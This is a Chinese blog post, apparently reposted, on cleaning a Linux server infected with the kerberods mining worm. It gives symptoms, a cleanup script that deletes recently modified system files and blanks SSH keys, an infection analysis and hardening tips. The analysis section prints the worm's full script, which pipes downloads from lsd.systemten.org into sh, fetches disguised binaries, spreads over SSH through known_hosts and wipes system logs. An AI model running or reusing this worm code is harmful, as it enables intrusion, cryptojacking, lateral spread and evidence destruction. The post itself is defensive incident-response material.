打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP

首页

好书

留言交流

下载APP

联系客服
我的天,我的Linux服务器感染了kerberods病毒
userphoto 关注

一、症状及表现

1、CPU使用率异常,top命令显示CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发现CPU被大量占用。

注:ls top ps等命令已经被病毒的动态链接库劫持,无法正常使用,大家需要下载busybox。

2、crontab 定时任务异常,存在以下内容;

3、后期病毒变异,劫持sshd,导致远程登陆失败,偶尔还会跳出定时任务失败,收到新邮件等问题

4、 存在异常文件、异常进程以及异常开机项

二、查杀方法

1、断网,停止定时任务服务;

2、查杀病毒主程序,以及保护病毒的其他进程;

3、恢复被劫持的动态链接库和开机服务;

4、重启服务器和服务;

附查杀脚本(根据情况修改)

(脚本参考(https://blog.csdn.net/u010457406/article/details/89328869))

#!/bin/bash#可以重复执行几次,防止互相拉起导致删除失败function installBusyBox(){ #参考第一段 busybox|grep BusyBox |grep v}function banHosts(){ #删除免密认证,防止继续通过ssh进行扩散,后续需自行恢复,可不执行 busybox echo '' > /root/.ssh/authorized_keys busybox echo '' > /root/.ssh/id_rsa busybox echo '' > /root/.ssh/id_rsa.pub busybox echo '' > /root/.ssh/known_hosts #busybox echo '' > /root/.ssh/auth #iptables -I INPUT -p tcp --dport 445 -j DROP busybox echo -e '\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com\n0.0.0.0 systemten.org' >> /etc/hosts}function fixCron(){ #修复crontab busybox chattr -i /etc/cron.d/root 2>/dev/null busybox rm -f /etc/cron.d/root busybox chattr -i /var/spool/cron/root 2>/dev/null busybox rm -f /var/spool/cron/root busybox chattr -i /var/spool/cron/tomcat 2>/dev/null busybox rm -f /var/spool/cron/tomcat busybox chattr -i /var/spool/cron/crontabs/root 2>/dev/null busybox rm -f /var/spool/cron/crontabs/root busybox rm -rf /var/spool/cron/tmp.* busybox rm -rf /var/spool/cron/crontabs busybox touch /var/spool/cron/root busybox chattr i /var/spool/cron/root}function killProcess(){ #修复异常进程 #busybox ps -ef | busybox grep -v grep | busybox grep 'khugepageds' | busybox awk '{print $1}' |busybox sed 's/root//g' | busybox xargs kill -9 2>/dev/null #busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' |busybox sed 's/root//g' | busybox xargs kill -9 2>/dev/null #busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' |busybox sed 's/root//g' | busybox xargs kill -9 2>/dev/null #busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' |busybox sed 's/root//g' | busybox xargs kill -9 2>/dev/null #busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' |busybox sed 's/root//g' | busybox xargs kill -9 2>/dev/null busybox ps -ef | busybox grep -v grep | busybox grep '/usr/sbin/kerberods' | busybox awk '{print $1}' |busybox sed 's/root//g' | busybox xargs kill -9 2>/dev/null busybox ps -ef | busybox grep -v grep | busybox grep '/usr/sbin/sshd' | busybox awk '{print $1}' |busybox sed 's/root//g' | busybox xargs kill -9 2>/dev/null busybox ps -ef | busybox grep -v grep | busybox egrep '/tmp/kauditds' | busybox awk '{print $1}' |busybox sed 's/root//g' | busybox xargs kill -9 2>/dev/null busybox ps -ef | busybox grep -v grep | busybox egrep '/tmp/sshd' | busybox awk '{print $1}' |busybox sed 's/root//g' | busybox xargs kill -9 2>/dev/null busybox rm -f /tmp/khugepageds busybox rm -f /tmp/migrationds busybox rm -f /tmp/sshd busybox rm -f /tmp/kauditds busybox rm -f /tmp/migrationds busybox rm -f /usr/sbin/sshd busybox rm -f /usr/sbin/kerberods busybox rm -f /usr/sbin/kthrotlds busybox rm -f /usr/sbin/kintegrityds busybox rm -f /usr/sbin/kpsmouseds busybox find /tmp -mtime -4 -type f | busybox xargs busybox rm -rf}function clearLib(){ #修复动态库 busybox chattr -i /etc/ld.so.preload busybox rm -f /etc/ld.so.preload busybox rm -f /usr/local/lib/libcryptod.so busybox rm -f /usr/local/lib/libcset.so busybox chattr -i /etc/ld.so.preload 2>/dev/null busybox chattr -i /usr/local/lib/libcryptod.so 2>/dev/null busybox chattr -i /usr/local/lib/libcset.so 2>/dev/null busybox find /usr/local/lib/ -mtime -4 -type f| busybox xargs rm -rf busybox find /lib/ -mtime -4 -type f| busybox xargs rm -rf busybox find /lib64/ -mtime -4 -type f| busybox xargs rm -rf busybox rm -f /etc/ld.so.cache busybox rm -f /etc/ld.so.preload busybox rm -f /usr/local/lib/libcryptod.so busybox rm -f /usr/local/lib/libcset.so busybox rm -rf /usr/local/lib/libdevmapped.so busybox rm -rf /usr/local/lib/libpamcd.so busybox rm -rf /usr/local/lib/libdevmapped.so busybox touch /etc/ld.so.preload busybox chattr i /etc/ld.so.preload ldconfig}function clearInit(){ #修复异常开机项 #chkconfig netdns off 2>/dev/null #chkconfig –del netdns 2>/dev/null #systemctl disable netdns 2>/dev/null busybox rm -f /etc/rc.d/init.d/kerberods busybox rm -f /etc/init.d/netdns busybox rm -f /etc/rc.d/init.d/kthrotlds busybox rm -f /etc/rc.d/init.d/kpsmouseds busybox rm -f /etc/rc.d/init.d/kintegrityds busybox rm -f /etc/rc3.d/S99netdns #chkconfig watchdogs off 2>/dev/null #chkconfig --del watchdogs 2>/dev/null #chkconfig --del kworker 2>/dev/null #chkconfig --del netdns 2>/dev/null}function recoverOk(){ service crond start busybox sleep 3 busybox chattr -i /var/spool/cron/root # 将杀毒进程加入到定时任务中,多次杀毒 echo '*/10 * * * * /root/kerberods_kill.sh' | crontab - # 恢复被劫持的sshd 服务 #busybox cp ~/sshd_new /usr/sbin/sshd #service sshd restart echo 'OK,BETTER REBOOT YOUR DEVICE'}#先停止crontab服务echo '1| stop crondtab service!'service crond stop#防止病毒继续扩散echo '2| banHosts!'banHosts#清除lib劫持echo '3| clearLib!'clearLib#修复crontabecho '4| fixCron!'fixCron#清理病毒进程echo '5| killProcess!'killProcess#删除异常开机项echo '6| clearInit! 'clearInit#重启服务和系统echo '7| recover!'recoverOk

查杀完成以后重启服务器,发现过段时间,登陆主机,无论本地还是ssh远程登陆,依然会有病毒进程被拉起,观察top里面的进程,并用pstree 回溯进程之间的关系,发现每次用户登陆就会有病毒进程被拉起,怀疑登陆时加载文件存在问题,逐个排查下列文件:

  • /etc/profile,
  • ~/.profile,
  • ~/.bash_login,
  • ~/.bash_profile,
  • ~/.bashrc,
  • /etc/bashrc;

    • 最后终于发现/etc/bashrc 文件被加入了一些似曾相识的语句

    删除并次查杀病毒(重复之前查杀步骤),重启服务器,观察一段时间后不再有病毒程序被拉起,至此病毒被查杀完全。

    三、病毒分析

    1、感染路径

    • 攻击者通过网络进入第一台被感染的机器(redis未认证漏洞、ssh密码暴力破解登录等)。
    • 第一台感染的机器会读取known_hosts文件,遍历ssh登录,如果是做了免密登录认证,则将直接进行横向传播。

    2、病毒主要模块

    • 主恶意程序:kerberods
    • 恶意Hook库:libcryptod.so libcryptod.c
    • 挖矿程序:khugepageds
    • 恶意脚本文件:netdns (用作kerberods的启停等管理)
    • 恶意程序:sshd (劫持sshd服务,每次登陆均可拉起病毒进程)

    3、执行顺序

    ① 执行恶意脚本下载命令

    ② 主进程操作

    1> 添加至开机启动,以及/etc/bashrc

    2> 生成了sshd文件 劫持sshd服务

    3> 将netdns文件设置为开机启动

    4> 编译libcryptod.c为/usr/local/lib/libcryptod.so

    5> 预加载动态链接库,恶意hook关键系统操作函数

    6> 修改/etc/cron.d/root文件,增加定时任务

    7> 拉起khugepageds挖矿进程

    附病毒恶意进程代码

    export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbinmkdir -p /tmpchmod 1777 /tmpecho '* * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh' | crontab -ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep 'xmr'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep 'xig'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep 'ddgs'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep 'qW3xT'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep 'wnTKYg'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep 't00ls.ru'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep 'sustes'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep 'thisxxs'|awk '{print $2}' | xargs kill -9ps -ef|grep -v grep|grep 'hashfish'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep 'kworkerds'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep '/tmp/devtool'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep 'systemctI'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep 'sustse'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep 'axgtbc'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep 'axgtfa'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep '6Tx3Wq'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep 'dblaunchs'|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep '/boot/vmlinuz'|awk '{print $2}'|xargs kill -9cd /tmptouch /usr/local/bin/writeable && cd /usr/local/bin/touch /usr/libexec/writeable && cd /usr/libexec/touch /usr/bin/writeable && cd /usr/bin/rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeableexport PATH=$PATH:$(pwd)if [ ! -f '/tmp/.XImunix' ] || [ ! -f '/proc/$(cat /tmp/.XImunix)/io' ]; then    chattr -i sshd    rm -rf sshd    ARCH=$(uname -m)    if [ ${ARCH}x = 'x86_64x' ]; then        (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -O sshd) && chmod  x sshd    else        (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -O sshd) && chmod  x sshd    fi        $(pwd)/sshd || /usr/bin/sshd || /usr/libexec/sshd || /usr/local/bin/sshd || sshd || ./sshd || /tmp/sshd || /usr/local/sbin/sshdfiif [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then  for h in $(grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & donefifor file in /home/*do    if test -d $file    then        if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then            for h in $(grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done        fi    fidoneecho 0>/var/spool/mail/rootecho 0>/var/log/wtmpecho 0>/var/log/secureecho 0>/var/log/cron#

    四、安全防护

    1.SSH

    ① 谨慎做免密登录

    ② 尽量不使用默认的22端口

    ③ 增强root密码强度

    2.Redis

    ① 增加授权认证(requirepass参数)

    ② 尽量使用docker版本(docker pull redis)

    ③ 隐藏重要的命令

    转载于:https://mp.weixin.qq.com/s/oJbmB4OqdhuT4yn4lKnrug

    本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
    打开APP,阅读全文并永久保存 查看更多类似文章
    猜你喜欢
    类似文章
    【热】打开小程序,算一算2024你的财运
    awk 与 xargs的联合使用
    Linux 上 12 个高效的文本过滤命令
    Linux中Kill进程的N种方法
    Linux kill, killall, kill
    三分钟构建私有云平台
    TDsql 15大组件安装路径,启停,及日志目录
    更多类似文章 >>
    生活服务
    热点新闻
    留言交流
    回顶部
    联系我们
    分享 收藏 导长图 关注 下载文章
    绑定账号成功
    后续可登录账号畅享VIP特权!
    如果VIP功能使用有故障,
    可点击这里联系客服!

    联系客服